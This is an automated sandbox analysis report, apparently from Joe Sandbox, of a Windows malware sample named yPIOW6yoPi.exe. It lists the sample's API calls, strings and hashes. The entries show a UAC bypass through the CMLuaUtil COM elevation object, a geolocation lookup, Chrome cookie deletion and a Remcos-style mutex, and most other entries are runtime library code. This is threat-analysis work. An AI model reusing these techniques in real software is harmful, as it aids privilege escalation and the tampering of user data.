                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 020FFE63
                                                  • int.LIBCPMT ref: 020FFE76
                                                    • Part of subcall function 020FD147: std::_Lockit::_Lockit.LIBCPMT ref: 020FD158
                                                    • Part of subcall function 020FD147: std::_Lockit::~_Lockit.LIBCPMT ref: 020FD172
                                                  • std::_Facet_Register.LIBCPMT ref: 020FFEB2
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 020FFED8
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 020FFEF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: P[G
                                                  • API String ID: 2536120697-571123470
                                                  • Opcode ID: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                  • Instruction ID: b4aeb759649902303b868b8666afa2734a163cf320512ed68481f21f7536ca2b
                                                  • Opcode Fuzzy Hash: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                  • Instruction Fuzzy Hash: 10113631E80629ABCB54F7A4D844AEE77799F40714B200069FA09775C0EB709F45DBD4
                                                  Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                  • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                  Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                  • _free.LIBCMT ref: 0044FD29
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 0044FD34
                                                  • _free.LIBCMT ref: 0044FD3F
                                                  • _free.LIBCMT ref: 0044FD93
                                                  • _free.LIBCMT ref: 0044FD9E
                                                  • _free.LIBCMT ref: 0044FDA9
                                                  • _free.LIBCMT ref: 0044FDB4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                  Function 0213FF42 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0213FC89: _free.LIBCMT ref: 0213FCB2
                                                  • _free.LIBCMT ref: 0213FF90
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0213FF9B
                                                  • _free.LIBCMT ref: 0213FFA6
                                                  • _free.LIBCMT ref: 0213FFFA
                                                  • _free.LIBCMT ref: 02140005
                                                  • _free.LIBCMT ref: 02140010
                                                  • _free.LIBCMT ref: 0214001B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction ID: e16f1f5a1fd16697f5ddad1d3ac4e7be25e3352c165673fa1d4f0b31c6ae9656
                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction Fuzzy Hash: 79114F719C0B0CBED522B7B1CC05FCBBFAF9F09B20F400815A69966851DB77B9094E50
                                                  Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe), ref: 00406835
                                                    • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                    • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                  • CoUninitialize.OLE32 ref: 0040688E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-2353147453
                                                  • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                  • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                  Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                  • int.LIBCPMT ref: 0040FEF2
                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                  • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: H]G
                                                  • API String ID: 2536120697-1717957184
                                                  • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                  • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                  • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                  • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                  Function 02100139 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02100146
                                                  • int.LIBCPMT ref: 02100159
                                                    • Part of subcall function 020FD147: std::_Lockit::_Lockit.LIBCPMT ref: 020FD158
                                                    • Part of subcall function 020FD147: std::_Lockit::~_Lockit.LIBCPMT ref: 020FD172
                                                  • std::_Facet_Register.LIBCPMT ref: 02100195
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 021001BB
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021001D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: H]G
                                                  • API String ID: 2536120697-1717957184
                                                  • Opcode ID: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                  • Instruction ID: 52c7765708a5e76615725d44811dfa0c7db9ff682b86663612339fb3877588ae
                                                  • Opcode Fuzzy Hash: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                  • Instruction Fuzzy Hash: A411C631980518EFCB14FBA4C984AEDB77A9F58714B200059E405671D0EFB0DF46CF95
                                                  Function 020F69CB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 020F69EF
                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 020F6A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$[+] CoGetObject SUCCESS$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-4254711192
                                                  • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction ID: db1128475e27b3f1e98184f618eb2b92c31a9abccdf98bcb7f91e2240e8eaa82
                                                  • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction Fuzzy Hash: 5011A5B2950228AFDB10EBA4D854BDEB7BCDF44710F50006AF904E3540FB799E148E79
                                                  Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                  • GetLastError.KERNEL32 ref: 0040B2EE
                                                  Strings
                                                  • UserProfile, xrefs: 0040B2B4
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                  • [Chrome Cookies not found], xrefs: 0040B308
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: d277c2480a2acdc88d81545d73a68c117e64bf0eb3316d6d5e723ac94531354e
                                                  • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                  • Opcode Fuzzy Hash: d277c2480a2acdc88d81545d73a68c117e64bf0eb3316d6d5e723ac94531354e
                                                  • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                  Function 0210CBD6 Relevance: 10.5, APIs: 7, Instructions: 47windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0210CBEF
                                                    • Part of subcall function 0210CC86: RegisterClassExA.USER32(00000030), ref: 0210CCD3
                                                    • Part of subcall function 0210CC86: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0210CCEE
                                                    • Part of subcall function 0210CC86: GetLastError.KERNEL32 ref: 0210CCF8
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0210CC26
                                                  • lstrcpyn.KERNEL32(00473B68,0046C104,00000080), ref: 0210CC40
                                                  • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0210CC56
                                                  • TranslateMessage.USER32(?), ref: 0210CC62
                                                  • DispatchMessageA.USER32(?), ref: 0210CC6C
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0210CC79
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1970332568-0
                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction ID: e870f3f885a83525ed013f1c5c3f7df24de48c0686c65927f8a14ae8671185f4
                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction Fuzzy Hash: B80144B1904348ABD7109FA5ED4CEDB7BBCA745B16F004135F605E30A2D7B8A285DF68
                                                  Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$Rmc-I7G983$BG
                                                  • API String ID: 0-977880241
                                                  • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                  • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                  Function 020F6737 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$Rmc-I7G983$BG
                                                  • API String ID: 0-977880241
                                                  • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction ID: 6ea58e811fe75114d0e2bdbc96349baf05204e0a519867bf453569366ec5c46e
                                                  • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction Fuzzy Hash: 9CF0FC70AC13108BCBA03B306D147B9365EE740792F004475F719D7961EB254881A688
                                                  Function 004432E7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00443305
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 00443317
                                                  • _free.LIBCMT ref: 0044332A
                                                  • _free.LIBCMT ref: 0044333B
                                                  • _free.LIBCMT ref: 0044334C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: XNY
                                                  • API String ID: 776569668-3785567681
                                                  • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                  • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                  • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                  • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                  Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                  • Sleep.KERNEL32(00002710), ref: 00419F79
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered$`#v
                                                  • API String ID: 614609389-3049340936
                                                  • Opcode ID: ed34942b98ab4bc35e84cddc730c191cd9dbe71c9bbe8efa97cecb4db88c0309
                                                  • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                  • Opcode Fuzzy Hash: ed34942b98ab4bc35e84cddc730c191cd9dbe71c9bbe8efa97cecb4db88c0309
                                                  • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                  Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __allrem.LIBCMT ref: 00439789
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                  • __allrem.LIBCMT ref: 004397BC
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                  • __allrem.LIBCMT ref: 004397F1
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                  • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                  Function 02129863 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __allrem.LIBCMT ref: 021299F0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02129A0C
                                                  • __allrem.LIBCMT ref: 02129A23
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02129A41
                                                  • __allrem.LIBCMT ref: 02129A58
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02129A76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction ID: f05b536ab75bb0b206f06950c3b98873eb190f31169cce1ba74a4a6091682182
                                                  • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction Fuzzy Hash: 13812AB2681726AFE7259E7CCC41B6A73AAEF40324F34453EF515DB680E770D5188B50
                                                  Function 02132D3F Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 02132DCF
                                                  • _free.LIBCMT ref: 02132DE9
                                                  • _free.LIBCMT ref: 02132DF4
                                                  • _free.LIBCMT ref: 02132EC8
                                                  • _free.LIBCMT ref: 02132EE4
                                                    • Part of subcall function 0212AABB: IsProcessorFeaturePresent.KERNEL32(00000017,0212AA8D,?,?,020F1BC9,?,?,00000000,?,?,0212AAAD,00000000,00000000,00000000,00000000,00000000), ref: 0212AABD
                                                    • Part of subcall function 0212AABB: GetCurrentProcess.KERNEL32(C0000417), ref: 0212AADF
                                                    • Part of subcall function 0212AABB: TerminateProcess.KERNEL32(00000000), ref: 0212AAE6
                                                  • _free.LIBCMT ref: 02132EEE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 2329545287-0
                                                  • Opcode ID: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
                                                  • Instruction ID: 2a20d5b704c794761f80cd2f6a56864a03ad9d8a674d5e911503e483238c509f
                                                  • Opcode Fuzzy Hash: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
                                                  • Instruction Fuzzy Hash: 4151BD365442156FDB26BF78D841BBABBEBDF41724F24406AED449B240EB339D02C790
                                                  Function 02139BB7 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,02139E08,00000001,00000001,00000006), ref: 02139C11
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,02139E08,00000001,00000001,00000006), ref: 02139C97
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02139D91
                                                  • __freea.LIBCMT ref: 02139D9E
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  • __freea.LIBCMT ref: 02139DA7
                                                  • __freea.LIBCMT ref: 02139DCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
